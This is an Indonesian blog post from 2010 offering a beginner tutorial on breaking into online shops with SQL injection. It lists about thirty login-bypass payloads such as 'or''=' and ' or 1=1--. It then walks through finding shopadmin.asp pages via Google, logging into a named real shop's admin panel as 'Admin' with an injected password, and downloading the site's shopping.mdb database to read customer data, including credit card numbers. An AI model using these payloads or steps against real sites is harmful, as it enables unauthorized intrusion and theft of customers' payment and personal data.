Minggu, 24 Oktober 2010
hack website dengan SQL injection
ini adalah tutorial khusus (newbie)
kita akan mencoba membobol sebuah website shop dengan admin panel .
biasanya disana ada beberapa data costumer seperti:
-CC number
-Dll
ok lgsng aja ke intinya :
ikuti semua step" ini .
kita akan menggunakan string SQL seperti :
'or''='
'or'1'
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
[By Unknown]
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
[By Comsec]
ok step sekarang kita akan mulai berhacking ria .
1:cobalah buka google,lalu ketiklah shopadmin.asp
2:buka lah beberapa link .
3:saya membuka web http://hoffmans.co.za/shopadmin.asp ( jika anda malas ikuti saja web itu )
(selanjutnya ikuti langkah" ini)
4:jika anda mengikutin URL yg ada di atas ini jika sudah terbuka nanti akan ada kotak untuk mengisi Username Dan Password
5:ketiklah username itu dengan nama "Admin"
6:sekarang kita akan menggunakan bug SQL injection (isilah password dengan 'or''=' (jgn ada yg di ubah satu karakter pun)
7:jika sudah berarti kita sudah succes
8:disana ada beberapa data" mengenai website dan customer
9:coba lah ganti linknya dengan http://hoffmans.co.za/shopping.mdb
10:jika keluar window download (download file tersebut,itulah file yg berisi data" di website tersebut)
11:buka file tersebut dengan microsoft acces.
Enjoy ...
ini adalah tutorial untuk newbie.
Tidak ada komentar:
Posting Komentar
kasih ++ yaa...^_^